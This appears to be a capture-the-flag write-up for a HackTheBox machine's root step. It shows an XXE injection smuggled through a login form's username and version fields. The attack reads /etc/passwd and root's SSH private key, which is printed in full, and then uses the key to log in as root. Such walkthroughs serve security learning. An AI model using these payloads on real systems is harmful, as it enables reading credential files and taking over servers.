7 localhost:8080 XXE

# something is runing locally, its a website of some sort, checked using curl
# port forward via ssh to explore more

$ ssh -i chiv_id_rsa -L 8081:localhost:8080 chiv@spider.htb
Last login: Thu Oct  7 03:35:05 2021 from 10.10.16.7

http://localhost:8081 > http://localhost:8081/login
Beta Login
| asking only username

# admin works (any user works)
> http://localhost:8081/site
Checkout cart (with items)

GET /site HTTP/1.1
Host: localhost:8081
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost:8081/login
DNT: 1
Connection: close
Cookie: session=.eJxNjEFvgyAARv_KwnkH7WqTmexiAG03cKCActPRBC1as5HU2fS_z16aHb-8770rcPPgQHwFTy2IgUAUGzSX7HSQXPlRDqE6KvLbZrprBN6W6ZQYEUJWcSIh_xDIvpthv4jCw5WPhaBJjqeM94m-8_vWgYNMmQML0FZjm7cp9VTZTobiW0lTmBRXFFpCQr1Tbu1JVxE1M715Hf_7PLOXekFRs_ZJlXRNz18EItFXSuZc2YYv-FIP56B4_M1GnUxKsBMUecYWF9X9PiI4GT_L4A3cnsF07kb_A-Lg9gfxF1a8.YV5wDA.SAZyqkHxs51fGOUlS8eloTqmq4g
Upgrade-Insecure-Requests: 1

# analyzing session cookie

$ flask-unsign --decode --cookie '.eJxNjEFvgyAARv_KwnkH7WqTmexiAG03cKCActPRBC1as5HU2fS_z16aHb-8770rcPPgQHwFTy2IgUAUGzSX7HSQXPlRDqE6KvLbZrprBN6W6ZQYEUJWcSIh_xDIvpthv4jCw5WPhaBJjqeM94m-8_vWgYNMmQML0FZjm7cp9VTZTobiW0lTmBRXFFpCQr1Tbu1JVxE1M715Hf_7PLOXekFRs_ZJlXRNz18EItFXSuZc2YYv-FIP56B4_M1GnUxKsBMUecYWF9X9PiI4GT_L4A3cnsF07kb_A-Lg9gfxF1a8.YV5wDA.SAZyqkHxs51fGOUlS8eloTqmq4g'
{'lxml': b'PCEtLSBBUEkgVmVyc2lvbiAxLjAuMCAtLT4KPHJvb3Q+CiAgICA8ZGF0YT4KICAgICAgICA8dXNlcm5hbWU+YWRtaW48L3VzZXJuYW1lPgogICAgICAgIDxpc19hZG1pbj4wPC9pc19hZG1pbj4KICAgIDwvZGF0YT4KPC9yb290Pg==', 'points': 0}

$ echo "PCEtLSBBUEkgVmVyc2lvbiAxLjAuMCAtLT4KPHJvb3Q+CiAgICA8ZGF0YT4KICAgICAgICA8dXNlcm5hbWU+YWRtaW48L3VzZXJuYW1lPgogICAgICAgIDxpc19hZG1pbj4wPC9pc19hZG1pbj4KICAgIDwvZGF0YT4KPC9yb290Pg==" |base64 -d
<!-- API Version 1.0.0 -->
<root>
    <data>
        <username>admin</username>
        <is_admin>0</is_admin>
    </data>
</root>

# every link on /site doesn't do anything; only /logout works and brings us back to /login
# time to Burp

http://localhost:8081/login
# source code shows hidden field

# submitting login page
POST /login HTTP/1.1
Host: localhost:8081
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 38
Origin: http://localhost:8081
DNT: 1
Connection: close
Referer: http://localhost:8081/login
Cookie: session=eyJwb2ludHMiOjB9.YV5xxQ.BR65NPl5rutXr6vagiIiKWE5rWU
Upgrade-Insecure-Requests: 1

username=kashz&version=1.0.0

XXE Attack

# we are sending both parameters that are in the cookie, seems like XML injection attack
# as username is controlled by us, injecting into that and trying to read /etc/passwd
| <!DOCTYPE foo [<!ENTITY xxe SYSTEM "/etc/passwd"> ]>
| usage &xxe;

# sending payload &kashz; and XXE
POST /login HTTP/1.1
Host: localhost:8081
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 28
Origin: http://localhost:8081
DNT: 1
Connection: close
Referer: http://localhost:8081/login
Cookie: session=eyJwb2ludHMiOjB9.YV51PA.nd1aJvshr7Sd43IsBhLqj_xczsM
Upgrade-Insecure-Requests: 1

username=%26kashz;&version=1.0.0<!DOCTYPE+foo+[<!ENTITY+kashz+SYSTEM+"/etc/passwd">+]>

# we get response
HTTP/1.1 302 FOUND
Content-Type: text/html; charset=utf-8
Content-Length: 217
Location: http://localhost:8081/site
Vary: Cookie
Set-Cookie: session=.eJxdj19rgzAAxL_KyPMejLUwCntxJnZusUvMn5q3SMq0xixUoe1Kv_ssrDD2ePzuuLsLcKfBgdUFPDRgBQQqsUUnTvtCMjV5OUC1U-TcrHVnBE54HlIrILJxWzHukOz1KGTB6QA7sm-9XISFwYUspeTSFaYSNjI5OZtMF6xfGslxxRzjVDlCXH1U235poau5Dz1xOIjcvWicBrplRGbsXaD2zQ6v36KasrnfV6JMNzis2T7VN37TOnIZVbagEUo0bjdNXk6lajsJxaEa4L3_Y-dt_J_T2P3JYy-QHXfu88yGqZPxCYr57wYd5_-hJr0-1M6OVqa-ie9-sjTzfjG0VMdPCc_K373jM7g-gvDV-WkEq-j6A-86eJU.YV53tg.es7M96TK3BHDMfS17mAAVESMtac; HttpOnly; Path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<title>Redirecting...</title>
<h1>Redirecting...</h1>
<p>You should be redirected automatically to target URL: <a href="/site">/site</a>.  If not click the link.

$ flask-unsign --decode --cookie '.eJxdj19rgzAAxL_KyPMejLUwCntxJnZusUvMn5q3SMq0xixUoe1Kv_ssrDD2ePzuuLsLcKfBgdUFPDRgBQQqsUUnTvtCMjV5OUC1U-TcrHVnBE54HlIrILJxWzHukOz1KGTB6QA7sm-9XISFwYUspeTSFaYSNjI5OZtMF6xfGslxxRzjVDlCXH1U235poau5Dz1xOIjcvWicBrplRGbsXaD2zQ6v36KasrnfV6JMNzis2T7VN37TOnIZVbagEUo0bjdNXk6lajsJxaEa4L3_Y-dt_J_T2P3JYy-QHXfu88yGqZPxCYr57wYd5_-hJr0-1M6OVqa-ie9-sjTzfjG0VMdPCc_K373jM7g-gvDV-WkEq-j6A-86eJU.YV53tg.es7M96TK3BHDMfS17mAAVESMtac'
{'lxml': b'PCEtLSBBUEkgVmVyc2lvbiAxLjAuMDwhRE9DVFlQRSBmb28gWzwhRU5USVRZIGthc2h6IFNZU1RFTSAiL2V0Yy9wYXNzd2QiPiBdPiAtLT4KPHJvb3Q+CiAgICA8ZGF0YT4KICAgICAgICA8dXNlcm5hbWU+Jmthc2h6OzwvdXNlcm5hbWU+CiAgICAgICAgPGlzX2FkbWluPjA8L2lzX2FkbWluPgogICAgPC9kYXRhPgo8L3Jvb3Q+', 'points': 0}

$ echo 'PCEtLSBBUEkgVmVyc2lvbiAxLjAuMDwhRE9DVFlQRSBmb28gWzwhRU5USVRZIGthc2h6IFNZU1RFTSAiL2V0Yy9wYXNzd2QiPiBdPiAtLT4KPHJvb3Q+CiAgICA8ZGF0YT4KICAgICAgICA8dXNlcm5hbWU+Jmthc2h6OzwvdXNlcm5hbWU+CiAgICAgICAgPGlzX2FkbWluPjA8L2lzX2FkbWluPgogICAgPC9kYXRhPgo8L3Jvb3Q+' | base64 -d
<!-- API Version 1.0.0<!DOCTYPE foo [<!ENTITY kashz SYSTEM "/etc/passwd"> ]> -->
<root>
    <data>
        <username>&kashz;</username>
        <is_admin>0</is_admin>
    </data>
</root>
# we need to close the comments using --> and start comment in the end to properly end it
# resending payload
| username=%26kashz;&version=1.0.0--><!DOCTYPE+foo+[<!ENTITY+kashz+SYSTEM+"/etc/passwd">+]><!--

# response
HTTP/1.1 302 FOUND
Content-Type: text/html; charset=utf-8
Content-Length: 217
Location: http://localhost:8081/site
Vary: Cookie
Set-Cookie: session=.eJxVj1FPgzAYRf-K6bMPBccSl_iCtCCmw7Z87da3shq7URhGkjEW_7tLTBZ9Pvee3HtBYeoCWl3QXYNWCMiaOjLVvC2V0GOvuki_a3ZuCrO3QBd1PqQOoowVgtveHaGFRFCTN5RKwOW4PbwsTOSWLvZS1UpBZKRuQ-Fyf2DdRyzBVDrABK0BwHSos1IzGpJq44wmydJkpbAqHXj3668pOxk81ex5zGzvk6s_YTTtm9iVHNMeiJM2F4WQVw60l7BODQ4Z145LapY6-FenwobpiVs1nLXyVROrz93sGYv-cxM__u2XovCn7UwSS4eCbdK9PYgHICzZ5WyqtLdipqdtd8Tylnexbl1-_QNrMnI-h9vetxo_oe97NBz3_fiFVvj7B7zJfLc.YV556A.3VZp3pZWZYgBJjdzx6uynwuUuao; HttpOnly; Path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<title>Redirecting...</title>
<h1>Redirecting...</h1>
<p>You should be redirected automatically to target URL: <a href="/site">/site</a>.  If not click the link.

# analysis
$ flask-unsign --decode --cookie '.eJxVj1FPgzAYRf-K6bMPBccSl_iCtCCmw7Z87da3shq7URhGkjEW_7tLTBZ9Pvee3HtBYeoCWl3QXYNWCMiaOjLVvC2V0GOvuki_a3ZuCrO3QBd1PqQOoowVgtveHaGFRFCTN5RKwOW4PbwsTOSWLvZS1UpBZKRuQ-Fyf2DdRyzBVDrABK0BwHSos1IzGpJq44wmydJkpbAqHXj3668pOxk81ex5zGzvk6s_YTTtm9iVHNMeiJM2F4WQVw60l7BODQ4Z145LapY6-FenwobpiVs1nLXyVROrz93sGYv-cxM__u2XovCn7UwSS4eCbdK9PYgHICzZ5WyqtLdipqdtd8Tylnexbl1-_QNrMnI-h9vetxo_oe97NBz3_fiFVvj7B7zJfLc.YV556A.3VZp3pZWZYgBJjdzx6uynwuUuao'
{'lxml': b'PCEtLSBBUEkgVmVyc2lvbiAxLjAuMC0tPjwhRE9DVFlQRSBmb28gWzwhRU5USVRZIGthc2h6IFNZU1RFTSAiL2V0Yy9wYXNzd2QiPiBdPjwhLS0gLS0+Cjxyb290PgogICAgPGRhdGE+CiAgICAgICAgPHVzZXJuYW1lPiZrYXNoejs8L3VzZXJuYW1lPgogICAgICAgIDxpc19hZG1pbj4wPC9pc19hZG1pbj4KICAgIDwvZGF0YT4KPC9yb290Pg==', 'points': 0}

$ echo 'PCEtLSBBUEkgVmVyc2lvbiAxLjAuMC0tPjwhRE9DVFlQRSBmb28gWzwhRU5USVRZIGthc2h6IFNZU1RFTSAiL2V0Yy9wYXNzd2QiPiBdPjwhLS0gLS0+Cjxyb290PgogICAgPGRhdGE+CiAgICAgICAgPHVzZXJuYW1lPiZrYXNoejs8L3VzZXJuYW1lPgogICAgICAgIDxpc19hZG1pbj4wPC9pc19hZG1pbj4KICAgIDwvZGF0YT4KPC9yb290Pg==' | base64 -d
<!-- API Version 1.0.0--><!DOCTYPE foo [<!ENTITY kashz SYSTEM "/etc/passwd"> ]><!-- -->
<root>
    <data>
        <username>&kashz;</username>
        <is_admin>0</is_admin>
    </data>
</root>

# burp shows output
Welcome, root:x:0:0:root:/root:/bin/bash
[truncated]
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
chiv:x:1000:1000:chiv:/home/chiv:/bin/bash

# trying to read /root/.ssh/id_rsa
| username=%26kashz;&version=1.0.0--><!DOCTYPE+foo+[<!ENTITY+kashz+SYSTEM+"/root/.ssh/id_rsa">+]><!--
# works
-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAl/dn2XpJQuIw49CVNdAgdeO5WZ47tZDYZ+7tXD8Q5tfqmyxq
gsgQskHffuzjq8v/q4aBfm6lQSn47G8foq0gQ1DvuZkWFAATvTjliXuE7gLcItPt
iFtbg7RQV/xaTwAmdRfRLb7x63TG6mZDRkvFvGfihWqAnkuJNqoVJclgIXLuwUvk
4d3/Vo/MdEUb02ha7Rw9oHSYKR4pIgv4mDwxGGL+fwo6hFNCZ+YK96wMlJc3vo5Z
EgkdKXy3RnLKvtxjpIlfmAZGu0T+RX1GlmoPDqoDWRbWU+wdbES35vqxH0uM5WUh
vPt5ZDGiKID4Tft57udHxPiSD6YBhLT5ooHfFQIDAQABAoIBAFxB9Acg6Vc0kO/N
krhfyUUo4j7ZBHDfJbI7aFinZPBwRtq75VHOeexud2vMDxAeQfJ1Lyp9q8/a1mdb
sz4EkuCrQ05O9QthXJp0700+8t24WMLAHKW6qN1VW61+46iwc6iEtBZspNwIQjbN
rKwBlmMiQnAyzzDKtNu9+Ca/kZ/cAjLpz3m1NW7X//rcDL8kBGs8RfuHqz/R4R7e
HtCvxuXOFnyo/I+A3j1dPHoc5UH56g1W82NwTCbtCfMfeUsUOByLcg3yEypClO/M
s7pWQ1e4m27/NmU7R/cslc03YFQxow+CIbdd59dBKTZKErdiMd49WiZSxizL7Rdt
WBTACsUCgYEAyU9azupb71YnGQVLpdTOzoTD6ReZlbDGeqz4BD5xzbkDj7MOT5Dy
R335NRBf7EJC0ODXNVSY+4vEXqMTx9eTxpMtsP6u0WvIYwy9C7K/wCz+WXNV0zc0
kcSQH/Yfkd2jADkMxHXkz9THXCChOfEt7IUmNSM2VBKb1xBMkuLXQbMCgYEAwUBS
FhRNrIB3os7qYayE+XrGVdx/KXcKva6zn20YktWYlH2HLfXcFQQdr30cPxxBSriS
BAKYcdFXSUQDPJ1/qE21OvDLmJFu4Xs7ZdGG8o5v8JmF6TLTwi0Vi45g38DJagEl
w42zV3vV7bsAhQsMvd3igLEoDFt34jO9nQv9KBcCgYEAk8eLVAY7AxFtljKK++ui
/Xv9DWnjtz2UFo5Pa14j0O+Wq7C4OrSfBth1Tvz8TcW+ovPLSD0YKODLgOWaKcQZ
mVaF3j64OsgyzHOXe7T2iq788NF4GZuXHcL8Qlo9hqj7dbhrpPUeyWrcBsd1U8G3
AsAj8jItOb6HZHN0owefGX0CgYAICQmgu2VjZ9ARp/Lc7tR0nyNCDLII4ldC/dGg
LmQYLuNyQSnuwktNYGdvlY8oHJ+mYLhJjGYUTXUIqdhMm+vj7p87fSmqBVoL7BjT
Kfwnd761zVxhDuj5KPC9ZcUnaJe3XabZU7oCSDbj9KOX5Ja6ClDRswwMP31jnW0j
64yyLwKBgBkRFxxuGkB9IMmcN19zMWA6akE0/jD6c/51IRx9lyeOmWFPqitNenWK
teYjUjFTLgoi8MSTPAVufpdQV4128HuMbMLVpHYOVWKH/noFetpTE2uFStsNrMD8
vEgG/fMJ9XmHVsPePviZBfrnszhP77sgCXX8Grhx9GlVMUdxeo+j
-----END RSA PRIVATE KEY-----

$ chmod 600 root_id_rsa
$ ssh -i root_id_rsa root@spider.htb
Last login: Fri Jul 23 14:11:40 2021
root@spider:~# whoami;id
root
uid=0(root) gid=0(root) groups=0(root)

Last updated